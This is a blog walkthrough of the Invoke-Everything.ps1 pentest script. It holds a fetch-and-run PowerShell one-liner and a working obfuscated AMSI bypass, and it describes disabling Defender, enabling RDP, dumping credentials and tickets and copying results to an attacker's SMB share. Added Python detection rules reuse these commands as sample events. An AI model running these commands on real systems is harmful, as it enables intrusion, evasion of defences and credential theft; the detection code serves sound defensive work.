Invoke-Everything.ps1

Ryan Yager
6 min read · Sep 8, 2022


Quick article explaining how to use Invoke-Everything, a script made by OvergrownCarrot1 (OGC). The script can be found here: https://github.com/overgrowncarrot1/Invoke-Everything/blob/main/invoke-everything.ps1

Invoke-Everything chains together several PowerShell scripts to help map a network, automating many of the commands used in Active Directory penetration testing. Because the script asks quite a few questions, running it through evil-winrm may not work properly; it works best in an interactive PowerShell session or over RDP. The following scripts are needed to use Invoke-Everything to its fullest:

PowerUp.ps1, PowerView.ps1, PowerView_Dev.ps1, PowerUpSQL.ps1, Invoke-Mimikatz.ps1, SharpHound.ps1

The Scripts used can be found at the bottom of this article.

To start with Invoke-Everything, a user can either put it on disk or load it in memory; I suggest in memory. Invoke-Everything can be loaded into memory on a Windows system with the following command:

iex (iwr -usebasicparsing https://github.com/overgrowncarrot1/Invoke-Everything/blob/main/invoke-everything.ps1)

Once in memory a user can utilize the command Invoke-Everything -AttackerIp <attacker ip address>. This will start the script.

The script will call back to the attacking machine's IP address and load the tools listed at the bottom of the article into memory, which means you will most likely need an AMSI bypass like the one below.

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

The attacker will also need a web server running on the attacking machine. Make sure all of the needed files are in the same folder, so that each of them can be downloaded into memory. The attacker should also have an SMB server running on the attacking machine: as the script runs it saves information into different files and then tries to send all of those files back to the attacking machine over SMB. The SMB server should be started with the -smb2support argument.

The first thing Invoke-Everything tries to do is disable Real Time Monitoring and AV protection; if the user does not have administrator privileges this most likely will not work. The script then gathers networking information, such as the IP configuration and the ARP table. After this the PowerShell scripts listed below are fetched by the victim machine, and Invoke-Everything uses them to keep collecting information for the attacker.
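From the defender's side, every stage described above leaves a trace in PowerShell script-block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log when ScriptBlock logging is enabled). The following is an added example, not code from the article or from OGC's script: a small set of detection rules run over constructed sample events that mirror the in-memory load, the AMSI bypass line from the article, the Real Time Monitoring change, the RDP change and the copy of results to an SMB share. Host names, user names, the 10.10.14.5 address and the rule names are assumptions; the one technique worth noting is that the base64-wrapped strings in the AMSI bypass are decoded before matching, since a plain substring match would miss them.

```python
"""
Added example (not from the article or the Invoke-Everything project):
detection rules for PowerShell script-block log events that match the
behaviours the article attributes to the script. Event records are
constructed and only mimic the fields of Event ID 4104; host names, user
names, the 10.10.14.5 address and the rule names are assumptions.
"""
import base64
import re

# Constructed sample events. Event 2 is the AMSI bypass line from the
# article; events 3-5 are the standard cmdlets a host would log for the
# "disable Real Time Monitoring", "turn on RDP" and "copy results over
# SMB" stages the article describes. Events 6 and 7 are benign controls.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "user": "CORP\\jdoe",
     "script": "iex (iwr -usebasicparsing https://github.com/overgrowncarrot1/Invoke-Everything/blob/main/invoke-everything.ps1)"},
    {"id": 2, "host": "WS01", "user": "CORP\\jdoe",
     "script": "[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)"},
    {"id": 3, "host": "WS01", "user": "CORP\\jdoe",
     "script": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 4, "host": "WS01", "user": "CORP\\jdoe",
     "script": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' -Name fDenyTSConnections -Value 0"},
    {"id": 5, "host": "WS01", "user": "CORP\\jdoe",
     "script": "Copy-Item .\\invoke.txt \\\\10.10.14.5\\share\\"},
    {"id": 6, "host": "WS02", "user": "CORP\\asmith",
     "script": "Get-ChildItem C:\\Users\\asmith\\Documents"},
    {"id": 7, "host": "WS02", "user": "CORP\\asmith",
     "script": "$t = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGVsbG8='))"},
]

# (name, pattern). Patterns key on intent (download-and-execute, reflection
# into the PowerShell engine, AV off, RDP on, copy to a UNC path) rather
# than on one tool's exact command line.
RULES = [
    ("download-cradle",
     re.compile(r"\biex\b.*\b(iwr|invoke-webrequest|downloadstring)\b", re.I)),
    ("reflection-on-automation-internals",
     re.compile(r"\[ref\]\.assembly\.gettype\(.*nonpublic", re.I | re.S)),
    ("defender-realtime-disabled",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$true", re.I)),
    ("rdp-enabled-via-registry",
     re.compile(r"fdenytsconnections.*-value\s+0\b", re.I)),
    ("outbound-smb-copy",
     re.compile(r"(copy-item|copy|move-item|net\s+use).*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I)),
]

B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def _decode_bytes(raw):
    # PowerShell's [Text.Encoding]::Unicode is UTF-16LE, so ASCII text shows
    # up with every second byte NUL; otherwise assume UTF-8.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_embedded_base64(script):
    """Decode every FromBase64String('...') literal found in a script block."""
    decoded = []
    for literal in B64_LITERAL.findall(script):
        try:
            decoded.append(_decode_bytes(base64.b64decode(literal, validate=True)))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def analyse_event(event):
    """Return the names of the rules that fire for one script-block event."""
    script = event["script"]
    hits = [name for name, pattern in RULES if pattern.search(script)]
    # Base64-wrapping 'AmsiUtils' / 'amsiInitFailed' hides them from a plain
    # string match, so inspect the decoded literals as well.
    if any("amsi" in text.lower() for text in decode_embedded_base64(script)):
        hits.append("amsi-string-in-base64")
    return hits


def triage(events):
    """Map event id -> fired rules, dropping events with no hits."""
    result = {}
    for event in events:
        hits = analyse_event(event)
        if hits:
            result[event["id"]] = hits
    return result


def hosts_with_tooling_pattern(events, min_rules=3):
    """Hosts on which at least min_rules distinct rules fired: one hit may be
    an admin doing their job, several in a row look like automation."""
    seen = {}
    for event in events:
        for rule in analyse_event(event):
            seen.setdefault(event["host"], set()).add(rule)
    return sorted(host for host, rules in seen.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
    print("hosts showing the tooling pattern:", hosts_with_tooling_pattern(SAMPLE_EVENTS))
```

The per-host correlation in hosts_with_tooling_pattern is the useful part: any single rule can fire on legitimate administration, but a workstation that loads a remote script, touches AMSI internals, turns Real Time Monitoring off, enables RDP and copies files to a UNC path inside a few minutes is exactly the sequence this kind of script produces.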

Below is a walkthrough of how to use Invoke-Everything.ps1 by OGC; we will be using a system on which we have administrator access:

First we have all of the tools needed within the same folder and have started a web server:

Lets also start up our SMB server on our attacker machine

As we try to put invoke-everything onto the victim machine we realize that an AMSI bypass is needed first

Now we can run the script without any problems

As you can see, the first question is whether we would like to run an AMSI bypass; although we already did one, we can say Y and run it again

We are then asked whether we have a web server and an SMB server running, which we do

Now the script starts to run; in the beginning it does not do anything malicious. It starts by getting the PowerShell command history, checking whether the machine is in a domain or a workgroup, listing installed software and hotfixes, trying to disable Real Time Monitoring, looking at the firewall policy and building a tree of the C:\ drive. This part can take a while, and the tree is written to a tree.txt file, which is sent back to the attacker's SMB server.

At this point, if the script takes longer than five minutes, press Enter: PowerShell sometimes gets stuck. If that interferes with the rest of the script, you may need to comment out the following lines, because of how PowerShell handles the tree command. If you comment out those lines, make sure to load invoke-everything back into memory so you are running the updated script.

After this the script asks whether we want to run a port scan. The Internal and External scans only check certain ports; InDepthInternal and InDepthExternal scan all ports and may take a long time. For this demonstration we will run an Internal port scan. The script will seem frozen; it is not, so let it run.

Next we are asked whether we want to turn on RDP on the system; we will answer Y

Now, if you have the proper permissions, port 3389 should be open on the victim machine and you should also have invoke.txt on your attacker machine via the SMB share (again depending on permissions; the script isn't magic)
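The port scan and the SMB copy-back in these two steps are visible on the network even when script-block logging is off. As an added example (not code from the article or from OGC's script), here is flow-level detection over constructed records shaped like Sysmon Event ID 3 (network connection) fields: a sliding-window count of distinct destination ports per source/destination pair catches the internal scan, and an allowlist of real file servers catches the TCP/445 session to the attacker's machine. Host names, addresses, the allowlist and the thresholds are assumptions.

```python
"""
Added example (not from the article or the Invoke-Everything project):
flow-level detection for two stages the article describes, the internal
port scan and the copy of result files back to an SMB server on the
attacker's machine. Records are constructed to resemble Sysmon Event ID 3
fields; host names, addresses, the allowlist and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry: (timestamp, source host, source ip, dest ip, dest port).
# WS01 sweeps six ports on one neighbour within a few seconds and then opens
# TCP/445 to an address that is not a known file server; WS02 only talks SMB
# to the real file server.
SAMPLE_FLOWS = [
    ("2022-09-08T10:00:01", "WS01", "10.10.10.20", "10.10.10.30", 22),
    ("2022-09-08T10:00:01", "WS01", "10.10.10.20", "10.10.10.30", 80),
    ("2022-09-08T10:00:02", "WS01", "10.10.10.20", "10.10.10.30", 135),
    ("2022-09-08T10:00:02", "WS01", "10.10.10.20", "10.10.10.30", 139),
    ("2022-09-08T10:00:03", "WS01", "10.10.10.20", "10.10.10.30", 445),
    ("2022-09-08T10:00:03", "WS01", "10.10.10.20", "10.10.10.30", 3389),
    ("2022-09-08T10:01:10", "WS01", "10.10.10.20", "10.10.14.5", 445),
    ("2022-09-08T10:01:30", "WS02", "10.10.10.21", "10.10.10.10", 445),
    ("2022-09-08T10:02:00", "WS02", "10.10.10.21", "10.10.10.10", 445),
]
KNOWN_FILE_SERVERS = frozenset({"10.10.10.10"})  # assumed allowlist


def parse_flow(record):
    ts, host, src, dst, port = record
    return datetime.fromisoformat(ts), host, src, dst, int(port)


def detect_port_sweeps(flows, min_ports=5, window=timedelta(seconds=60)):
    """Return {(src_host, dst_ip): most distinct ports seen inside any one
    `window`} for pairs that reached at least min_ports distinct ports."""
    by_pair = defaultdict(list)
    for ts, host, _src, dst, port in map(parse_flow, flows):
        by_pair[(host, dst)].append((ts, port))
    hits = {}
    for pair, conns in by_pair.items():
        conns.sort()
        start = 0
        for end in range(len(conns)):
            # advance the window start until it spans at most `window`
            while conns[end][0] - conns[start][0] > window:
                start += 1
            distinct = {port for _, port in conns[start:end + 1]}
            if len(distinct) >= min_ports:
                hits[pair] = max(hits.get(pair, 0), len(distinct))
    return hits


def detect_unexpected_smb(flows, allowlist=KNOWN_FILE_SERVERS):
    """Sorted (src_host, dst_ip) pairs that opened TCP/445 to a destination
    outside the file-server allowlist."""
    pairs = {(host, dst) for _ts, host, _src, dst, port in map(parse_flow, flows)
             if port == 445 and dst not in allowlist}
    return sorted(pairs)


def correlate(flows):
    """Hosts that both swept ports and reached SMB outside the allowlist:
    scan-then-exfiltrate is the order the article's walkthrough follows."""
    sweepers = {host for host, _dst in detect_port_sweeps(flows)}
    smb_out = {host for host, _dst in detect_unexpected_smb(flows)}
    return sorted(sweepers & smb_out)


if __name__ == "__main__":
    print("port sweeps:", detect_port_sweeps(SAMPLE_FLOWS))
    print("SMB outside allowlist:", detect_unexpected_smb(SAMPLE_FLOWS))
    print("hosts doing both:", correlate(SAMPLE_FLOWS))
```

Note that the sweep's own probe of port 445 on the neighbour also appears in the SMB list; that is correct behaviour rather than noise, and the correlate step is what separates a single odd SMB session from the scan-then-copy pattern.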

The script then checks whether the user is an administrator; if so, mimikatz commands will be run, and if not the script skips this next portion

After this, persistence is created and the script asks more questions before continuing. In the next portion, if you do not understand what it is asking, answer N; it can be extremely dangerous to drop some of this information

For our demonstration we will answer Y

As you can see above we dropped the cred vault and also the tickets

More dangerous stuff

After this we can try other things such as pass the hash and getting into a SQL server if one exists. We will not be doing either for this demonstration

Now the only thing left to do is look at the different files that were created and comb through them to find ways to either (a) escalate privileges or (b) move laterally

Lastly, remember that there is going to be a lot of output; you need to comb through it for the information you want. Hopefully the script helps, and thanks for reading.


Written by Ryan Yager

Known on Twitch and YouTube as OvergrownCarrot1 or OGC
